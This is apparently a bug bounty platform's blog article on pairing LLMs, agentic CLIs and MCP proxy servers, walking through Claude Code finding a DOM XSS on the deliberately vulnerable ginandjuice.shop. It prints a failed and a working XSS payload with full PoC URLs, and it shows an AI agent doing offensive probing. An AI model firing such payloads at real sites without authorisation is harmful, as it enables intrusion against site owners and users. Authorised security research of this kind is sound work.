How to hack with LLMs, agentic CLIs, MCP servers

Large language models (LLMs) are becoming an integral part of the Bug Bounty workflow. Used well, they help hunters analyse code, generate tooling, review proxy traffic, craft reports and move faster during active testing. Used poorly, they produce confident false positives and low-quality submissions.

This article covers where large language models add real leverage in AI vulnerability research, where they can mislead, and how pairing an agentic CLI with an MCP server turns a chat model into an invaluable part of your offensive security toolkit.

How LLMs are changing Bug Bounty workflows

LLMs are now a core tool for a growing number of hunters. Exploit code and custom tooling that once took hours to write can now be crafted in minutes. Serving as parallel research assistants during active engagements, LLMs can also help hunters summarise notes, review code paths, generate payload ideas and cover more attack surface, faster, than ever before.

However, your competitive advantage disappears if most other hunters probing your target are themselves using LLMs.

The qualities that truly give you an edge have not fundamentally changed: curiosity, domain expertise and the ability to think like an attacker. Accomplished hunters use AI to build more robust testing workflows and accelerate vulnerability discovery. Meanwhile, hunters lacking the expertise to interpret and validate model outputs are flooding platforms with false positives and low-quality AI-generated reports aka 'slop' (script-kiddie behavior at scale).

Using LLMs in Bug Bounty without false positives

The worst thing you can do is run an LLM with zero idea of what it is actually doing. If you point a model at a target, it flags a 'critical' finding and you submit it straight to the program, you have probably just reported a false positive.

Doing so wastes the time of triagers and every other hunter waiting in the queue. Platforms have become much stricter about raw LLM-generated reports, and repeated false positives can damage your reputation and potentially result in a platform ban.

The professional approach is simple: validate the finding yourself. Reproduce the issue from the LLM's output, confirm that it poses a real security risk and only then write the report.

Agentic CLIs and MCP Servers: The real leverage in LLM Bug Bounty hunting

Plenty of LLMs can help you hunt. Run one locally with Ollama or use a cloud model from Anthropic, OpenAI or Google. What matters more than which model you choose is how you drive it, what context you give it and how carefully you validate its output.

Agentic command-line tools let the model read your notes, edit files, run commands and integrate with the rest of your Bug Bounty toolkit through MCP. MCP, or Model Context Protocol, gives AI assistants a standard way to connect to external tools and data sources. In a Bug Bounty workflow, that means the model can work with your proxy, project files, notes and testing context instead of operating as a disconnected chat window.

The most popular agentic CLI tools are:

Claude Code from Anthropic

Gemini CLI from Google

Codex from OpenAI

An agentic CLI paired with an MCP server for your favourite proxy, whether it's Burp Suite, Caido or another tool, lets the model work inside the same environment as you. It can see your proxy history, follow your attack methods, help generate payload ideas and detect issues you may have missed.

That is where the real advantage of using LLMs in Bug Bounty lies: the model is not replacing you, it's a second set of eyes working alongside you.

Practical MCP Server setup for Burp Suite and Caido

The setup is straightforward: an agentic CLI driving an LLM, connected via MCP to your primary proxy.

For Burp Suite, PortSwigger publishes an MCP Server extension that exposes HTTP history and request replay to the model. For Caido, there is a community-built MCP server by c0tton-fluff, alongside Caido's own official agent skills.

With either tool wired up, the LLM operates inside your security testing environment as an assistant, not a black box.

For example, to connect Burp Suite's MCP server to Claude Code, create a .mcp.json file in your Bug Bounty working directory with the following config:

1{
2  "mcpServers": {
3    "burpsuite": {
4      "type": "sse",
5      "url": "http://localhost:9876/"
6    }
7  }
8}

Claude Code picks this up on startup and exposes Burp's HTTP history and request replay tools to the model. The same can be done with the CLI: claude mcp add burpsuite --transport sse --url http://localhost:9876/.

If you prefer Caido, the Caido MCP plugin by c0tton-fluff exposes a similar bridge between the proxy and your agentic CLI. The setup steps differ slightly from Burp Suite's, so the official Caido MCP documentation is the recommended starting point.

LLM Bug Bounty Hunting in Practice: Why you always validate the PoC

To see an agentic CLI in action, we can run Claude Code alongside our manual testing on an intentionally vulnerable target. PortSwigger provides ginandjuice.shop, a deliberately vulnerable web application built to test vulnerability scanners and offensive security tooling.

It fits our purpose well: a controlled environment where we can compare what the LLM surfaces against what we find ourselves. This matters because a model may identify the right parameter, sink or vulnerability class, while still producing a proof of concept (PoC) that does not actually work.

Start Claude Code in your working directory and provide a focused prompt such as:

1Your goal is to test the "search" GET parameter on "https://ginandjuice.shop/blog/?search=test" for vulnerabilities. Report any finding with the vulnerability class, payload, full PoC URL and clear verification steps.

We direct Claude Sonnet 4.6 to probe the parameter while we test in parallel through our proxy, guiding the model whenever we spot something it should look at more closely.

When Claude Code starts, it processes our prompt and begins enumerating the target.

While we run our own manual testing in parallel, Claude Code finishes its analysis and reports back a finding: a DOM-based XSS in the search GET parameter.

Verifying LLM Bug Bounty findings

Now comes the most important step. We must confirm this is a real vulnerability, not a hallucination or a reflected payload that never actually executes.

We start by testing the proof-of-concept link the model provided:

1https://ginandjuice.shop/blog/?search="><img src=x onerror=alert(document.domain)>

If the payload fires, the vulnerability is legitimate and we can move on to writing the report. If it does not, we investigate the failure manually and feed that context back into the LLM to improve future testing accuracy.

Clicking the link, we see that the LLM gave us an invalid PoC. Submitting this report without verification could have resulted in an N/A closure and damaged your platform reputation.

Why manual PoC validation is critical

The next step is to understand why the proposed payload failed. The source code the LLM pointed to does look exploitable, so the LLM did its job. Now it's time to do ours: manual analysis, payload refinement and PoC validation.

We first locate the vulnerable code snippet in the client-side code:

1<script>
2function trackSearch(query) {
3    document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
4}
5var query = (new URLSearchParams(window.location.search)).get('search');
6if(query) {
7    trackSearch(query);
8}
9</script>

The code exists, and to an experienced eye it is clearly vulnerable to DOM XSS. So why did the LLM's PoC fail?

It failed because the application blocks payloads that introduce new HTML tags, which filtered out the model's <img> payload. The vulnerability is real, but the proof was not. Switching to an event-handler injection that reuses an existing tag works cleanly:

1x" onload=alert(1) y="z

Full working PoC URL:

1https://ginandjuice.shop/blog/?search=x" onload=alert(1) y="z

The LLM correctly identified the vulnerability but produced a payload that the application's filter rejected. This is exactly why manual PoC validation is non-negotiable in LLM-assisted Bug Bounty hunting: confirming the exploit yourself is the difference between a reproducible finding that earns a payout and a report closed as N/A.

Writing better Bug Bounty reports with LLMs

Treat report writing as seriously as the hacking itself. Once you've manually validated a finding, an LLM can help turn your notes into a clean, reproducible report.

But the final report still needs your eyes on it: verify that every payload, endpoint, request, response and impact claim matches your own testing.

Hitting 'submit' without that check is a fast track to a possible platform ban.

The line between a credible LLM-assisted report and AI slop is simple: did you reproduce the vulnerability yourself, and does the report cover only what matters?

Every strong vulnerability report follows the same structure: description, steps to reproduce, proof of concept, and impact. Write the first draft yourself, using technical details from your own testing.

Once the substance is there, an LLM is useful for fixing grammar, tightening the structure, and clarifying impact and reproduction steps. It should never write a report from scratch without your validated findings as input. We strongly recommend following our guide 'How to write an effective Bug Bounty report ', which explains what a high-quality report looks like and how to structure one. You can also share that guide with the LLM so both you and the model work from the same reporting framework.

Why AI-generated reports get hunters banned

What you should never outsource to the model is the proof itself. The PoC must come from your own testing: your screenshots, your request and response pairs, your scripts, your video walkthrough of the exploit chain. Triagers can spot AI-generated filler quickly, and the report loses all credibility the moment they do.

How platforms are responding to AI-generated Bug Bounty reports

Triagers on all major Bug Bounty platforms are reporting a flood of low-quality reports bearing the hallmarks of careless AI use. The same LLM access that accelerates accomplished hunters has lowered the barrier for people who have no idea what they are submitting.

AI slop reports might look legit at first glance but contain fabricated vulnerabilities that LLMs have hallucinated. Platforms are responding with stricter validation requirements, heavier reputation weighting and serious penalties, including platform bans, for accounts that rack up too many N/A.

For experienced hunters, this is actually good news. When the floor drops, the signal from a quality report gets louder. A well-structured submission with a clear description of the vulnerability type, documented reproduction steps, and real security impact stands out more than ever.

Triagers remember the hunters who save them time. Your enhanced reputation will unlock private programs and your validation skills will help you bag the biggest bounties.

Hacking in the age of AI: LLMs, agentic CLIs and MCP servers for Bug Bounty hunters